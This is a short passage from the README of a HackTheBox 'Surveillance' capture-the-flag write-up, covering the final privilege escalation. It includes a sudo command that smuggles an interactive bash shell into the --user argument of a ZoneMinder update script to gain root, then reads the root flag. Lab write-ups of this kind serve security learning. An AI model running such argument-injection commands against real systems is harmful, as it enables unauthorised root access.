LucaLeukert/HTB-Surveillance/README.md

 Using the version and the knowlage of google i found that you can use the `/usr/bin/zmupdate.pg` file to get root permission.
 - `sudo /usr/bin/zmupdate.pg --version=1 --user='$(/bin/bash -i)' --pass=YOUR_ZONEMINDER_PASSWORD`

+With our newly obtained root access we can read the root-flag with `cat /root/root.txt`

 #### Conclusion
 After having pwned the machine I can say it was a very interesting adventure.
 Sadly the machine was very unresponsive, which it to be expected for a free service but still their is quite some headroom left for [HackTheBox](https://app.hackthebox.com) to improve.
 GET PWNED BOZO!!